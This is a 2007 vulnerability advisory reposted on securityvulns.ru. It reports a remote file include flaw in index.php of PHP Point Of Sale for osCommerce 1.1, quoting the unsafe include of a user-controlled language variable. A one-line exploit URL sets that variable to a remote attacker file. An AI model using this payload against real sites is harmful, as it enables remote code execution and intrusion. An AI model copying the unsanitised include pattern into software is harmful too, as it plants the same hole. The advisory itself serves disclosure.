Computer Security

Security Advisory: PHP Point Of Sale for osCommerce <= (index.php) Remote File Include Vuln
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  WebLog (index.php file) Remote File Disclosure Vulnerability

  Creative Guestbook 1.0 Multiple Remote Vulnerabilities

  McGallery 0.5b Arbitrary File Download Vulnerability

  WBBlog (XSS/SQL) Multiple Remote Vulnerabilities

From:BorN To K!LL BorN To K!LL <q.t.i_(at)_hotmail.com>
Date:17.03.2007
Subject:PHP Point Of Sale for osCommerce <= (index.php) Remote File Include Vuln

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

PHP Point Of Sale for osCommerce <= (index.php) Remote File Include Vuln

Script: PHP Point Of Sale for osCommerce

Version: 1.1

URL:
http://puzzle.dl.sourceforge.net/sourceforge/phppointofsale/PHP_Point_Of_Sale_osC
ommerce_1.1.zip

Discover: BorN To K!LL

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

Bug in:
index.php ..... and so on ...

code:
include ("language/$cfg_language");

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

ExploiT:
~~~~~
wWw.SiTe.cOm/[path]/index.php?cfg_language=shitcode?

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

GreeTz 2:

Dr.2 - str0ke - AsbMay ....

KuW SeC ..... AsbMay's Group

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru